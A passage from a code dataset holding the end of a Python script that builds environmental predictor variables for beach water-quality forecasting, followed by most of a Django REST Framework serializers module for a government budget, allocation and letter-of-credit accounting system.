s][0]\nwave = pd.read_csv(os.path.join(folder,'data/waves/',s), parse_dates=['dt'], index_col=['dt'])\nwave.index.name = 'date'\n\nwave['WVHT_q75'] = (wave.WVHT > wave.WVHT.quantile(.75)).astype(int)\nwave.loc[wave.WVHT.isna(),'WVHT_q75'] = np.nan\nwave['DPD_q75'] = (wave.DPD > wave.DPD.quantile(.75)).astype(int)\nwave.loc[wave.DPD.isna(),'DPD_q75'] = np.nan\n\nprint('\\nWave (N=' + str(len(wave)) + ', ' + str(wave.index.year.min()) + '-' + str(wave.index.year.max()) + ')\\nMissing:')\nprint(wave.isna().sum().sort_values(ascending=False).replace(0,np.nan).dropna())\n\n## Water Quality\ns = [s for s in os.listdir(os.path.join(folder,'data/water_quality/CenCOOS')) if stations.wq.replace(' ','_') in s][0]\nwq = pd.read_csv(os.path.join(folder,'data/water_quality/CenCOOS',s), index_col=['dt'], parse_dates=['dt'])\nwq.index = wq.index.date\nwq.index = wq.index.astype('datetime64[ns]')\nwq.index.name = 'date'\n\nfor c in ['chl','turb']:\n if c not in wq.columns:\n continue\n wq['log'+c] = np.log10(wq[c]+1)\n wq[c+'_q75'] = (wq[c] > wq[c].quantile(.75)).astype(int)\n wq.loc[wq[c].isna(),c+'_q75'] = np.nan\n\nprint('\\nWater Quality (N=' + str(len(wq)) + ', ' + str(wq.index.year.min()) + '-' + str(wq.index.year.max()) + ')\\nMissing:')\nprint(wq.isna().sum().sort_values(ascending=False).replace(0,np.nan).dropna())\n\n## Currents\ntry:\n s = [s for s in os.listdir(os.path.join(folder,'data/currents/')) if stations.currents.replace(' ','_') in s][0]\n currents = pd.read_csv(os.path.join(folder,'data/currents/',s), index_col=['dt'], parse_dates=['dt'])\n currents.index.name = 'date'\n \n currents.drop(['lat','lon'], axis=1, inplace=True)\n \n currents['current_mag'] = np.sqrt((currents.u**2) + (currents.v**2))\n currents['current_q75'] = (currents['current_mag'] > currents['current_mag'].quantile(.75)).astype(int)\n currents.loc[currents['current_mag'].isna(),'current_q75'] = np.nan\n \n currents['cross_bin'] = np.nan\n currents.loc[currents.cross > 0,'cross_bin'] = 1\n currents.loc[currents.cross < 0,'cross_bin'] = 0\n \n currents['cross_mag'] = currents.cross.abs()\n \n currents['along_bin'] = np.nan\n currents.loc[currents.along > 0,'along_bin'] = 1\n currents.loc[currents.along < 0,'along_bin'] = 0\n \n currents['along_mag'] = currents.along.abs()\n \n print('\\nCurrents (N=' + str(len(currents)) + ', ' + str(currents.index.year.min()) + '-' + str(currents.index.year.max()) + ')\\nMissing:')\n print(currents.isna().sum().sort_values(ascending=False).replace(0,np.nan).dropna())\n \nexcept:\n currents = pd.DataFrame()\n\n## Met\nmet = pd.read_csv(stations.met, parse_dates=['date'], index_col=['date'])\n\n# Note: CIMIS data do not include wind direction...taking wind from other station\nwind = pd.read_csv(stations.wind, parse_dates=['dt'], index_col=['dt'])# download hourly data\nwind['awind'] = wind['wspd'] * round(np.sin(((wind['wdir'] - angle) / 180) * np.pi), 1)\nwind['owind'] = wind['wspd'] * round(np.cos(((wind['wdir'] - angle) / 180) * np.pi), 1)\nwind = wind.resample('1D').mean()\nwind.index = wind.index.date\nwind.index.name = 'date'\nwcols = ['gust','wspd','awind','owind']\nwind = wind[[c for c in wcols if c in wind.columns]]\nwcols = wind.columns\n# for i in [1,2,3]:\n# wind[[c+str(i) for c in wcols]] = wind[wcols].shift(i) # lags\n\nmet.drop([c for c in wcols if c in met.columns],axis=1, inplace=True)\nmet = pd.concat([met,wind], axis=1)\n\nmet['wet'] = ((met['rain'] + met['rain3T']) > 0.1*25.4).astype(int) # greater than .1 in (in mm)\n \nmet['wspd_q75'] = (met.wspd > met.wspd.quantile(.75)).astype(int)\nmet.loc[met['wspd'].isna(),'wspd_q75'] = np.nan\nmet['owind_bin'] = (met.owind > 0).astype(int)\nmet.loc[met['owind'].isna(),'owind_bin'] = np.nan\nmet['awind_bin'] = (met.awind > 0).astype(int)\nmet.loc[met['awind'].isna(),'awind_bin'] = np.nan\n\nprint('\\nMet (N=' + str(len(met)) + ', ' + str(met.index.year.min()) + '-' + str(met.index.year.max()) + ')\\nMissing:')\nprint(met.isna().sum().sort_values(ascending=False).replace(0,np.nan).dropna())\n\n\n### Combine into ENV dataframe\nenv = pd.concat([met, wq, tide, wave, upwell, currents, flow], axis=1)\n\n#%% Lag Variables\nassert len(env) == len(pd.date_range(env.index[0],env.index[-1])), 'EVs not continuous time series'\n\n### EVs (except rain)\nfor v in lag_vars:\n if v not in env:\n continue\n \n for i in lag_range:\n if v[-1].isalpha():\n var_name = v+str(i)\n else:\n var_name = v + '_' + str(i)\n \n env[var_name] = env[v].shift(i)\n \n### Rain (shift-lag totals)\n# Rain totals between \"lag_start\" and \"lag_start\"+\"lag_shift\" days ago\nlag_start = range(1,6) \nlag_shift = [2,3,5,7,14,30]\n\nrain = met.rain.copy()\nassert len(rain) == len(pd.date_range(rain.index[0],rain.index[-1])), 'rain df not continuous time series'\n\nfor i in lag_start:\n for s in lag_shift:\n var_name = 'lograin' + str(i) + '_' + str(i+s-1) + 'T'\n \n temp = rain.copy().shift(i)\n for j in range(1,s):\n temp += rain.copy().shift(i+j)\n \n env[var_name] = np.log10(temp + 1)\n \n \n#%% Combine and Save\n#df = pd.merge(fib, env, how='left', left_index=True, right_index=True) # index of FIB obs days only\ndf = pd.concat([fib, env], axis=1) # index is ALL days in range\ndf.sort_index(ascending=True, inplace=True)\ndf = df[sd:ed]\n\nout_file = os.path.join(folder, 'beach', beach.replace(' ','_'), 'variables', beach.replace(' ','_') + '__variables.csv')\ndf.to_csv(os.path.join(out_file))\n\nprint('Beach - ' + beach)\nprint('N - ' + str(len(df)))\nprint('Cols - ' + str(len(df.columns)) +'\\n')\nprint(df.columns)\n","repo_name":"rtsearcy/wq-forecasting","sub_path":"modeling/vars_combo.py","file_name":"vars_combo.py","file_ext":"py","file_size_in_byte":9228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"8361097277","text":"from functools import reduce\n\nfrom budget.models import (\n AllocationsDetail,\n DDOWiseAllocations,\n LCAmountVariationRemark,\n LCAuthorizationRequest,\n LcAuthRequestStatus,\n LCDetail,\n MileStone,\n MileStoneScroll,\n PaoBudget,\n ShortCodeBudget,\n ShortCodeBudgetAllocation,\n TransferBudget,\n)\nfrom budget.serializers import (\n AccountVariationRemarkSerializer,\n AllocationsDetailSerializer,\n)\nfrom budget.utils import get_short_code_available_balance\nfrom compilation.models import (\n Challan,\n Entry,\n PaymentClassificationScroll,\n ReceiptScrollClassification,\n ReceiptScrollStatus,\n TEClassification,\n TEStatus,\n TransferEntry,\n)\nfrom django.db.models import Sum\nfrom master.models import (\n FunctionalHeadMaster,\n ObjectHeadMaster,\n ShortCodeMapping,\n SubHead,\n)\nfrom master.serializers import (\n BankDetailListSerializer,\n CreateBranchSerializer,\n DDOMasterSerializerCodeList,\n PaoMasterCodeListSerializer,\n ShortCodeGetSerializer,\n)\nfrom pre_check.models import (\n BudgetOverride,\n PCBillClassification,\n PCBillPass,\n PCChequeDetail,\n)\nfrom rest_framework import serializers\n\nfrom .utils import (\n get_object_head,\n get_object_head_allocation_detail,\n get_short_code,\n get_sub_head,\n head_wise_ddo_wise_budget_allocation_and_balance,\n total_object_head_expenditure_ddo_wise,\n)\n\n\nclass CommonFinancialYearSerializer(serializers.Serializer):\n \"\"\"\n This serializer is used to provide common financial year.\n \"\"\"\n\n financial_year = serializers.CharField()\n\n\nclass TestToken(serializers.ModelSerializer):\n token = serializers.SerializerMethodField(\"get_token\")\n\n class Meta:\n model = PCBillPass\n fields = [\"pass_amount\", \"token\"]\n\n def get_token(self, obj):\n return obj.token\n\n\nclass BudgetOverridingSerializer(serializers.ModelSerializer):\n \"\"\"\n This serializer is used to provide budget override detail.\n \"\"\"\n\n function_head = serializers.CharField(\n source=\"budget_allocation.short_code_mapping.functional_head_matrix.function_head_master.function_head\"\n )\n object_head = serializers.CharField(\n source=\"budget_allocation.short_code_mapping.functional_head_matrix.objects_heads.description\"\n )\n sub_head = serializers.CharField(\n source=\"budget_allocation.short_code_mapping.functional_head_matrix.sub_head.description\",\n required=False,\n )\n category_override = serializers.CharField(\n source=\"budget_allocation.short_code_mapping.functional_head_matrix.category_master.code\"\n )\n ddo_code = serializers.CharField(source=\"budget_allocation.ddo_master.code\")\n ddo_description = serializers.CharField(\n source=\"budget_allocation.ddo_master.description\"\n )\n token_number = serializers.IntegerField(source=\"token.number\", required=False)\n transfer_entry_number = serializers.SerializerMethodField(\"get_te_number\")\n date = serializers.DateTimeField(source=\"created_at\", format=\"%d-%m-%Y\")\n pass_amount = serializers.FloatField(source=\"budget_after_override\")\n\n budget_balanced = serializers.DecimalField(\n max_digits=19, decimal_places=2, source=\"budget_balance\", required=False\n )\n\n class Meta:\n model = BudgetOverride\n fields = (\n \"date\",\n \"function_head\",\n \"object_head\",\n \"sub_head\",\n \"category_override\",\n \"ddo_code\",\n \"ddo_description\",\n \"token_number\",\n \"transfer_entry_number\",\n \"pass_amount\",\n \"budget_balanced\",\n \"override_amount\",\n )\n\n @staticmethod\n def get_te_number(inst):\n return (\n TEClassification.objects.filter(\n ddo__public_id=inst.budget_allocation.ddo_master.public_id,\n short_code__public_id=inst.budget_allocation.short_code_mapping.public_id,\n amount=inst.budget_after_override,\n operation=\"-\",\n )\n .filter(\n te__id__in=TransferEntry.objects.filter(\n status_on_te__in=TEStatus.objects.filter(\n status=\"Pass\", user_type=\"AAO\"\n )\n )\n )\n .last()\n .te.number\n if TEClassification.objects.filter(\n ddo__public_id=inst.budget_allocation.ddo_master.public_id,\n short_code__public_id=inst.budget_allocation.short_code_mapping.public_id,\n amount=inst.budget_after_override,\n operation=\"-\",\n ).filter(\n te__id__in=TransferEntry.objects.filter(\n status_on_te__in=TEStatus.objects.filter(\n status=\"Pass\", user_type=\"AAO\"\n )\n )\n )\n else \"TE_Not_Pass_AAO\"\n )\n\n\nclass LcReportSerializer(serializers.Serializer):\n \"\"\"\n Serializer is used to provide lc_type and ddo_master and detail.\n \"\"\"\n\n # financial_year = serializers.CharField()\n lc_type = serializers.CharField(required=False)\n ddo_master_id = serializers.CharField(required=False)\n lc_date = serializers.DateField(required=False)\n\n\nclass LCDetailSerializerForReport(serializers.ModelSerializer):\n class Meta:\n model = LCDetail\n fields = [\"public_id\", \"lc_number\", \"lc_date\", \"lc_from_period\", \"lc_to_period\"]\n\n\nclass LCAuthorizationRequestReportSerializer(serializers.ModelSerializer):\n \"\"\"\n This serializer is used to show lc auth detail report\n \"\"\"\n\n pao_master = PaoMasterCodeListSerializer()\n ddo_master = DDOMasterSerializerCodeList()\n short_code_mapping = serializers.SerializerMethodField(\"get_short_code_mapping\")\n bank = BankDetailListSerializer()\n branch = CreateBranchSerializer()\n lc_amount_variation = serializers.SerializerMethodField(\"get_amount_variation\")\n lc_detail = serializers.SerializerMethodField(\"get_lc_detail\")\n scroll = serializers.SerializerMethodField(\"get_scroll_amount\")\n remaining_amount = serializers.SerializerMethodField(\"get_amount_remain\")\n date = serializers.DateField(format=\"%d-%m-%y\")\n\n class Meta:\n model = LCAuthorizationRequest\n fields = [\n \"public_id\",\n \"lc_type\",\n \"auth_letter_no\",\n \"date\",\n \"pao_master\",\n \"lc_amount_variation\",\n \"bank\",\n \"branch\",\n \"ddo_master\",\n \"short_code_mapping\",\n \"budget_balance\",\n \"lc_detail\",\n \"scroll\",\n \"remaining_amount\",\n ]\n\n def get_short_code_mapping(self, obj):\n obj_detail = ShortCodeGetSerializer(\n obj.ddo_wise_allocation.short_code_mapping\n ).data\n\n list(\n map(\n obj_detail.__delitem__,\n filter(obj_detail.__contains__, [\"ddo_master\", \"major\"]),\n )\n )\n obj_detail.update(\n {\"short_codes\": obj.ddo_wise_allocation.short_code_mapping.short_codes}\n )\n return obj_detail\n\n def get_amount_variation(self, obj):\n return AccountVariationRemarkSerializer(\n obj.lc_amount_variation_on_lc_auth_request.filter().last(),\n ).data\n\n def get_lc_detail(self, obj):\n return {\n \"lc_detail\": LCDetailSerializerForReport(\n obj.lc_detail_on_lc_auth_request.filter(), many=True\n ).data,\n }\n\n def get_scroll_amount(self, obj):\n lc = obj.lc_detail_on_lc_auth_request.filter()\n if lc.last() and lc.last().milestone_on_lc_detail.filter():\n scroll_amount = 0\n for milestone in (\n obj.lc_detail_on_lc_auth_request.filter()\n .last()\n .milestone_on_lc_detail.filter()\n ):\n if milestone.scroll_on_milestone.filter():\n scroll_amount = scroll_amount + reduce(\n lambda a, b: a + b,\n [\n float(i[-1])\n for i in milestone.scroll_on_milestone.filter().values_list(\n \"amount\"\n )\n ],\n )\n return scroll_amount\n\n def get_amount_remain(self, obj):\n lc_amount = self.get_amount_variation(obj)\n scroll_amount = self.get_scroll_amount(obj)\n return (\n int(float(lc_amount[\"amount\"])) - 0 if not scroll_amount else scroll_amount\n )\n\n\nclass PaoBudgetSerializer(serializers.ModelSerializer):\n \"\"\"\n This serializer is used to provide PAO budget like short code,pao code,description and budget detail.\n \"\"\"\n\n short_code = serializers.CharField(source=\"short_code.short_codes\")\n pao_code = serializers.CharField(source=\"pao_budget.pao.code\")\n pao_description = serializers.CharField(source=\"pao_budget.pao.description\")\n budget_detail = serializers.SerializerMethodField(\"get_available_balance\")\n\n class Meta:\n model = ShortCodeBudget\n fields = (\n \"pao_code\",\n \"pao_description\",\n \"short_code\",\n \"amount\",\n \"budget_detail\",\n )\n\n @staticmethod\n def get_available_balance(obj):\n return get_short_code_available_balance(obj.short_code)\n\n\nclass BudgetAllocationDetailSerializer(serializers.Serializer):\n \"\"\"\n This Serializer created to validate pao budget allocation payload.\n \"\"\"\n\n number = serializers.IntegerField(required=False)\n latter_number = serializers.CharField(required=False)\n date = serializers.DateField(required=False, format=\"%d-%m-%y\")\n budget_type = serializers.CharField(default=\"None\", required=False)\n amount = serializers.DecimalField(default=0.00, max_digits=19, decimal_places=2)\n\n\nclass DDOAllocationsDetailSerializer(serializers.ModelSerializer):\n \"\"\"\n This Serializer created to validate pao budget allocation payload.\n \"\"\"\n\n letter_date = serializers.DateField(format=\"%d-%m-%y\")\n\n class Meta:\n model = AllocationsDetail\n fields = (\n \"letter_no\",\n \"letter_date\",\n \"budget_type\",\n \"amount\",\n )\n\n\nclass DDOWiseAllocationBudgetSerializer(serializers.ModelSerializer):\n \"\"\"\n This serializer is used to list of short code for ddo wise allocation..\n \"\"\"\n\n detail_description = serializers.CharField(\n source=\"short_code_mapping.functional_head_matrix.function_head_master.detail.description\"\n )\n function_head = serializers.CharField(\n source=\"short_code_mapping.functional_head_matrix.function_head_master.function_head\"\n )\n\n short_codes = serializers.CharField(source=\"short_code_mapping.short_codes\")\n\n ddo_code = serializers.CharField(source=\"ddo_master.code\")\n ddo_description = serializers.CharField(source=\"ddo_master.description\")\n\n allocation = serializers.SerializerMethodField(\"get_allocation\")\n\n class Meta:\n model = DDOWiseAllocations\n fields = [\n \"ddo_code\",\n \"ddo_description\",\n \"detail_description\",\n \"short_codes\",\n \"function_head\",\n \"total_amount\",\n \"allocation\",\n ]\n\n @staticmethod\n def get_allocation(inst):\n if inst.total_amount != 0:\n return DDOAllocationsDetailSerializer(\n inst.allocation_detail_on_ddo_wise.filter().last()\n ).data\n return {}\n\n\nclass ShortCodeBudgetAllocationSerializer(serializers.ModelSerializer):\n \"\"\"\n This Serializer created for short code budget detail response.\n \"\"\"\n\n cat_type = serializers.CharField(\n source=\"short_code.functional_head_matrix.category_master.type\"\n )\n short_codes = serializers.CharField(source=\"short_code.short_codes\")\n grant_description = serializers.CharField(source=\"grant.description\")\n allocation = serializers.SerializerMethodField(\"get_allocation\")\n ddo_wise_allocation = serializers.SerializerMethodField(\"get_ddo_wise_allocation\")\n\n class Meta:\n model = ShortCodeBudget\n fields = (\n \"cat_type\",\n \"short_codes\",\n \"grant_description\",\n \"amount\",\n \"allocation\",\n \"ddo_wise_allocation\",\n )\n\n @staticmethod\n def get_sub_head(inst):\n return (\n inst.short_code.functional_head_matrix.sub_head.description\n if inst.short_code.functional_head_matrix.sub_head\n else \"\"\n )\n\n @staticmethod\n def get_allocation(inst):\n if inst.amount != 0.00:\n return BudgetAllocationDetailSerializer(\n inst.allocation_on_short_code_budget.filter().last()\n ).data\n return {}\n\n @staticmethod\n def get_ddo_wise_allocation(inst):\n return DDOWiseAllocationBudgetSerializer(\n inst.short_code.ddo_allocation_on_short_code.filter(), many=True\n ).data\n\n\nclass PaoBudgetAllocationSerializer(serializers.ModelSerializer):\n \"\"\"\n Serializer is used to provide budget allocate detail on Pao level\n \"\"\"\n\n pao_id = serializers.IntegerField(source=\"pao.public_id\")\n pao_code = serializers.CharField(source=\"pao.code\")\n pao_description = serializers.CharField(source=\"pao.description\")\n grant_id = serializers.IntegerField(source=\"grant.public_id\")\n grant_number = serializers.CharField(source=\"grant.number\")\n grant_description = serializers.CharField(source=\"grant.description\")\n allocation = serializers.SerializerMethodField(\"get_allocation\")\n short_code_wise = serializers.SerializerMethodField(\"get_short_code_head_wise\")\n\n class Meta:\n model = PaoBudget\n fields = (\n \"pao_id\",\n \"pao_code\",\n \"pao_description\",\n \"grant_id\",\n \"grant_number\",\n \"grant_description\",\n \"public_id\",\n \"allocation\",\n \"short_code_wise\",\n \"financial_year\",\n )\n\n @staticmethod\n def get_short_code_head_wise(inst):\n return ShortCodeBudgetAllocationSerializer(\n ShortCodeBudget.objects.filter(\n short_code__functional_head_matrix__category_master__type=\"E-Expenditure\",\n grant=inst.grant,\n ),\n many=True,\n ).data\n\n @staticmethod\n def get_allocation(inst):\n return BudgetAllocationDetailSerializer(\n inst.allocation_on_pao_budget.filter().last()\n ).data\n\n\nclass BudgetDistributedAllocationParamsSerializer(serializers.Serializer):\n \"\"\"\n This Serializer created to validate pao budget allocation payload.\n \"\"\"\n\n financial_year = serializers.CharField()\n pao_id = serializers.IntegerField(source=\"pao__public_id\")\n grant_id = serializers.IntegerField(source=\"grant__public_id\")\n object_head_id = serializers.CharField(\n source=\"short_code__functional_head_matrix__objects_heads__public_id\",\n required=False,\n )\n sub_head_id = serializers.CharField(\n source=\"short_code__functional_head_matrix__sub_head__public_id\", required=False\n )\n\n\nclass ExpenditureControlRegisterParamsSerializer(serializers.ModelSerializer):\n \"\"\"\n This Serializer created to validate expenditure control on ddo master and short code mapping detail.\n \"\"\"\n\n financial_year = serializers.CharField()\n ddo_master_id = serializers.IntegerField(source=\"ddo_master__public_id\")\n short_code_mapping_id = serializers.IntegerField(\n source=\"short_code_mapping__public_id\"\n )\n\n class Meta:\n model = DDOWiseAllocations\n fields = (\"financial_year\", \"ddo_master_id\", \"short_code_mapping_id\")\n\n\nclass BillSerializer(serializers.ModelSerializer):\n \"\"\"\n Serializer is used to fetch token number,bill number and detail.\n \"\"\"\n\n token_number = serializers.IntegerField(source=\"bill_pass.token.number\")\n bill_number = serializers.CharField(source=\"bill_pass.token.bill.number\")\n date = serializers.DateTimeField(source=\"created_at\", format=\"%d-%m-%Y\")\n\n class Meta:\n model = PCBillClassification\n fields = (\"token_number\", \"bill_number\", \"amount\", \"date\")\n\n\nclass TEClassificationSerializers(serializers.ModelSerializer):\n number = serializers.IntegerField(source=\"te.number\")\n description = serializers.CharField(source=\"te.remark\")\n te_date = serializers.DateField(source=\"te.date\", format=\"%d-%m-%Y\")\n\n class Meta:\n model = TEClassification\n fields = (\"te_date\", \"number\", \"description\", \"amount\", \"operation\")\n\n\nclass MilestoneScrollSerializer(serializers.ModelSerializer):\n date_scroll = serializers.DateTimeField(source=\"date\", format=\"%d-%m-%Y\")\n number = serializers.CharField(source=\"milestone.lc_detail.lc_number\")\n\n class Meta:\n model = MileStoneScroll\n fields = (\"number\", \"description\", \"amount\", \"date_scroll\")\n\n\nclass ReceiptScrollClassificationSerializers(serializers.ModelSerializer):\n challan_number = serializers.CharField(source=\"challan.number\")\n challan_date = serializers.DateField(source=\"challan.date\", format=\"%d-%m-%Y\")\n amount = serializers.DecimalField(\n max_digits=19, decimal_places=2, source=\"challan.amount\"\n )\n source = serializers.CharField(source=\"challan.source\")\n\n class Meta:\n model = ReceiptScrollClassification\n fields = (\"challan_date\", \"challan_number\", \"amount\", \"source\")\n\n\nclass ExpenditureControlRegisterSerializer(serializers.ModelSerializer):\n \"\"\"\n Serializer created to validate expenditure control on ddo master and short code mapping detail.\n \"\"\"\n\n function_head = serializers.CharField(\n source=\"short_code_mapping.functional_head_matrix.function_head_master.function_head\"\n )\n object_head_code = serializers.CharField(\n source=\"short_code_mapping.functional_head_matrix.objects_heads.description\"\n )\n sub_head_code = serializers.CharField(\n source=\"short_code_mapping.functional_head_matrix.sub_head.description\",\n required=False,\n )\n short_code = serializers.CharField(source=\"short_code_mapping.short_codes\")\n ddo_code = serializers.CharField(source=\"ddo_master.public_id\")\n ddo_description = serializers.CharField(source=\"ddo_master.description\")\n cat_code = serializers.CharField(\n source=\"short_code_mapping.functional_head_matrix.category_master.code\"\n )\n cat_type = serializers.CharField(\n source=\"short_code_mapping.functional_head_matrix.category_master.type\"\n )\n bill_pass_entry = serializers.SerializerMethodField(\"get_bill_pass\")\n transfer_entry = serializers.SerializerMethodField(\"get_transfer_entry\")\n vr_challan_entry = serializers.SerializerMethodField(\"get_vr_challan_entry\")\n letter_credit_entry = serializers.SerializerMethodField(\"get_scroll_detail\")\n total_budget = serializers.DecimalField(\n decimal_places=2, max_digits=19, source=\"total_amount\"\n )\n total_expenditure = serializers.SerializerMethodField(\"get_total_expenditure\")\n\n class Meta:\n model = DDOWiseAllocations\n fields = (\n \"total_budget\",\n \"total_expenditure\",\n \"function_head\",\n \"object_head_code\",\n \"sub_head_code\",\n \"short_code\",\n \"ddo_code\",\n \"ddo_description\",\n \"cat_code\",\n \"cat_type\",\n \"bill_pass_entry\",\n \"transfer_entry\",\n \"vr_challan_entry\",\n \"letter_credit_entry\",\n \"financial_year\",\n )\n\n def get_total_expenditure(self, inst):\n params = self.context\n short_code_id = inst.short_code_mapping.public_id\n ddo_id = inst.ddo_master.public_id\n return total_object_head_expenditure_ddo_wise([ddo_id], short_code_id, params)\n\n @staticmethod\n def get_bill_pass(inst):\n return BillSerializer(\n PCBillClassification.objects.filter(\n short_code__public_id=inst.short_code_mapping.public_id,\n bill_pass__ddo_code__public_id=inst.ddo_master.public_id,\n bill_pass__cheque_on_bill_pass__cheque__isnull=False,\n )\n .distinct()\n .order_by(\"bill_pass__token__number\"),\n many=True,\n ).data\n\n @staticmethod\n def get_transfer_entry(inst):\n return TEClassificationSerializers(\n TEClassification.objects.filter(\n ddo__public_id=inst.ddo_master.public_id,\n short_code__public_id=inst.short_code_mapping.public_id,\n ).filter(\n te__id__in=TransferEntry.objects.filter(\n status_on_te__in=TEStatus.objects.filter(\n status=\"Pass\", user_type=\"AAO\"\n )\n )\n ),\n many=True,\n ).data\n\n @staticmethod\n def get_scroll_detail(inst):\n return MilestoneScrollSerializer(\n MileStoneScroll.objects.filter(\n milestone__lc_detail__lc_authorization_request__in=LCAuthorizationRequest.objects.filter(\n short_code__public_id=inst.short_code_mapping.public_id\n ),\n milestone__lc_detail__lc_authorization_request__ddo_master__public_id=inst.ddo_master.public_id,\n lc_milestone_on_payment_scroll__in=PaymentClassificationScroll.objects.filter(),\n ),\n many=True,\n ).data\n\n @staticmethod\n def get_vr_challan_entry(inst):\n short_code_id = inst.short_code_mapping.public_id\n ddo_id = inst.ddo_master.public_id\n return ReceiptScrollClassificationSerializers(\n ReceiptScrollClassification.objects.filter(\n scroll__status_on_receipt_scroll__in=ReceiptScrollStatus.objects.filter(\n # user_type=\"AAO\",\n status=\"Pass\",\n scroll__classification_on_receipt_scroll__challan__in=Challan.objects.filter(\n ddo__public_id=ddo_id,\n classification_on_challan__short_code__public_id=short_code_id,\n ),\n ),\n ),\n many=True,\n ).data\n\n\nclass BillDetailSerializer(serializers.ModelSerializer):\n token = serializers.IntegerField(source=\"bill_pass.token.number\")\n voucher = serializers.IntegerField(source=\"bill_pass.token.voucher.number\")\n bill_date = serializers.DateField(\n source=\"bill_pass.token.bill.date\", format=\"%d-%m-%Y\"\n )\n bill_number = serializers.CharField(source=\"bill_pass.token.bill.number\")\n bill_amount = serializers.DecimalField(\n max_digits=19, decimal_places=2, source=\"bill_pass.token.bill.amount\"\n )\n cheque_number = serializers.CharField(source=\"cheque.number\")\n\n class Meta:\n model = PCChequeDetail\n fields = (\n \"token\",\n \"voucher\",\n \"bill_number\",\n \"bill_date\",\n \"bill_amount\",\n \"cheque_number\",\n \"amount\",\n )\n\n\nclass BudgetOverridingParamsSerializer(serializers.Serializer):\n \"\"\"\n This serializer is used to provide budget override detail.\n \"\"\"\n\n financial_year = serializers.CharField()\n start_date = serializers.DateField()\n end_date = serializers.DateField()\n\n\nclass EntryRegisterSerializer(serializers.ModelSerializer):\n \"\"\"\n \"\"\"\n\n ddo_code = serializers.CharField(source=\"ddo.code\")\n ddo_description = serializers.CharField(source=\"ddo.code\")\n\n class Meta:\n model = Entry\n fields = (\n \"ddo_code\",\n \"ddo_description\",\n \"amount\",\n \"remark\",\n )\n\n\nclass EntryParamsSerializer(serializers.ModelSerializer):\n \"\"\"\n This Serializer created to validate ddo budget detail.\n \"\"\"\n\n ddo_id = serializers.IntegerField(source=\"ddo__public_id\")\n short_code_mapping_id = serializers.IntegerField(\n source=\"short_code__short_code_mapping__public_id\"\n )\n\n class Meta:\n model = Entry\n fields = (\"ddo_id\", \"short_code_mapping_id\")\n\n\nclass AuthorizationRegisterParamsSerializer(serializers.ModelSerializer):\n \"\"\"\n Serializer created to provide shortcode mapping and ddo master detail of lc auth budget.\n \"\"\"\n\n financial_year = serializers.CharField()\n short_code_mapping_id = serializers.CharField(\n source=\"short_code_mapping__public_id\"\n )\n ddo_master_id = serializers.IntegerField(source=\"ddo_master__public_id\")\n\n class Meta:\n model = LCAuthorizationRequest\n fields = (\"financial_year\", \"short_code_mapping_id\", \"ddo_master_id\")\n\n\nclass LCAuthorizationBudgetParamsSerializer(serializers.ModelSerializer):\n \"\"\"\n Serializer created to provide shortcode mapping and ddo master detail of lc auth budget.\n \"\"\"\n\n financial_year = serializers.CharField()\n short_code_mapping_id = serializers.CharField(\n source=\"short_code_mapping__public_id\"\n )\n ddo_master_id = serializers.IntegerField(source=\"ddo_master__public_id\")\n\n class Meta:\n model = DDOWiseAllocations\n fields = (\"financial_year\", \"short_code_mapping_id\", \"ddo_master_id\")\n\n\nclass LCAuthorizationBudgetSerializer(serializers.ModelSerializer):\n \"\"\"\n This serializer is used to get list of lc auth detail for budget.\n \"\"\"\n\n grant_number = serializers.IntegerField(\n source=\"short_code_mapping.grant_master.number\"\n )\n function_head = serializers.CharField(\n source=\"short_code_mapping.functional_head_matrix.function_head_master.function_head\"\n )\n object_code = serializers.CharField(\n source=\"short_code_mapping.functional_head_matrix.objects_heads.object_code\"\n )\n category_code = serializers.CharField(\n source=\"short_code_mapping.functional_head_matrix.category_master.code\"\n )\n category_description = serializers.CharField(\n source=\"short_code_mapping.functional_head_matrix.category_master.description\"\n )\n ddo_code = serializers.CharField(source=\"ddo_master.code\")\n\n class Meta:\n model = DDOWiseAllocations\n fields = [\n \"grant_number\",\n \"function_head\",\n \"object_code\",\n \"category_code\",\n \"category_description\",\n \"total_amount\",\n \"ddo_code\",\n ]\n\n\nclass ALLDDOWiseAllocationReportParams(serializers.ModelSerializer):\n \"\"\"\n Serializer is used to validate list of all ddo wise allocation.\n \"\"\"\n\n financial_year = serializers.CharField()\n ddo_master_id = serializers.IntegerField(\n source=\"short_code_budget__short_code__ddo_master__public_id\"\n )\n short_code_id = serializers.IntegerField(\n source=\"short_code_budget__short_code__public_id\"\n )\n\n class Meta:\n model = ShortCodeBudgetAllocation\n fields = (\n \"financial_year\",\n \"ddo_master_id\",\n \"short_code_id\",\n \"budget_type\",\n )\n\n\nclass ALLDDOAllocationsDetailSerializer(serializers.ModelSerializer):\n public_id = serializers.IntegerField(required=False)\n allocation_number = serializers.IntegerField(required=False)\n ddo_code = serializers.CharField(\n source=\"ddo_wise_allocation.ddo_master.code\", required=False\n )\n ddo_description = serializers.CharField(\n source=\"ddo_wise_allocation.ddo_master.description\", required=False\n )\n letter_date = serializers.DateField(format=\"%d-%m-%Y\")\n\n class Meta:\n model = AllocationsDetail\n fields = (\n \"public_id\",\n \"ddo_code\",\n \"ddo_description\",\n \"amount\",\n \"letter_no\",\n \"allocation_number\",\n \"letter_date\",\n \"budget_type\",\n )\n\n\nclass ALLDDOWiseAllocationReportSerializer(serializers.ModelSerializer):\n \"\"\"\n Serializer is used to validate list of all ddo wise allocation.\n \"\"\"\n\n short_code_mapping = serializers.CharField(\n source=\"short_code_budget.short_code.short_codes\"\n )\n grant_number = serializers.CharField(source=\"short_code_budget.grant.number\")\n allocation_detail = serializers.SerializerMethodField(\"get_allocation_detail\")\n total_ddo_allocation_amount = serializers.SerializerMethodField(\"get_total_balance\")\n short_code_balance = serializers.DecimalField(\n source=\"amount\", max_digits=19, decimal_places=2\n )\n\n class Meta:\n model = ShortCodeBudgetAllocation\n fields = (\n \"short_code_mapping\",\n \"grant_number\",\n \"short_code_balance\",\n \"budget_type\",\n \"total_ddo_allocation_amount\",\n \"allocation_detail\",\n )\n\n @staticmethod\n def get_allocation_detail(inst):\n return ALLDDOAllocationsDetailSerializer(\n AllocationsDetail.objects.filter(\n short_code_budget_allocation=inst,\n ).exclude(budget_type=\"Transfer\"),\n many=True,\n ).data\n\n @staticmethod\n def get_total_balance(inst):\n return (\n AllocationsDetail.objects.filter(short_code_budget_allocation=inst)\n .exclude(budget_type=\"Transfer\")\n .aggregate(total_amount=Sum(\"amount\"))[\"total_amount\"]\n )\n\n\nclass 